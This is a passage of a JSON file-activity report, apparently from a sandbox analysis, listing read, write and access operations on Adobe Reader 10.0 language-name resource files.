"norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.de_de_preeuro.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.el.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.el.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.el.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.el.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.el_GR.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.el_gr.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.el_GR.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.el_gr.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.el_GR_PREEURO.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.el_gr_preeuro.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.el_GR_PREEURO.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.el_gr_preeuro.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_CA.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_ca.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_CA.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_ca.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_GB.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_gb.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_GB.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_gb.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_GB_EURO.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_gb_euro.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_GB_EURO.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_gb_euro.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_US.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_us.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_US.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_us.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_US_POSIX.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_us_posix.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_US_POSIX.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_us_posix.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_AR.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_ar.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_AR.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_ar.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_BO.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_bo.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_BO.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_bo.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_CL.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_cl.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_CL.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_cl.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_CO.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_co.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_CO.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_co.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_CR.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_cr.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_CR.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_cr.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_DO.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_do.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_DO.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_do.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_EC.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_ec.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_EC.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_ec.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_ES.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_es.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_ES.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_es.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_ES_PREEURO.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_es_preeuro.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_ES_PREEURO.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_es_preeuro.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_GT.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_gt.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_HN.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_hn.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_MX.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_mx.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_NI.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_ni.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_PA.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_pa.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_PE.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_pe.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_PR.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_pr.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_PY.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_py.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_SV.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_sv.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_US.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_us.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_UY.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_uy.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_VE.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_ve.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es__TRADITIONAL.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es__traditional.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.et.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.et.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.et_EE.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.et_ee.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fi.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fi.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fi_FI.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fi_fi.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fi_FI_PREEURO.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fi_fi_preeuro.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fr_CA.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fr_ca.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fr_FR.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fr_fr.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fr_FR_PREEURO.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fr_fr_preeuro.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.he.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.he.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.he_IL.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.he_il.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.hr.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.hr.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.hr_HR.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.hr_hr.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.hu.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.hu.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.hu_HU.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.hu_hu.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.it.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.it.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.it_CH.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.it_ch.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.it_IT.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.it_it.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.it_IT_PREEURO.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.it_it_preeuro.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ja.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ja.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ja_JP.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ja_jp.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ja_JP_TRADITIONAL.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ja_jp_traditional.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ko.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ko.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ko_KR.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ko_kr.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.lt.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.lt.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.lt_LT.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.lt_lt.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.lv.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.lv.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.lv_LV.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.lv_lv.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nb.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nb.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nb_NO.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nb_no.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl_BE.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl_be.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl_BE_PREEURO.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl_be_preeuro.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 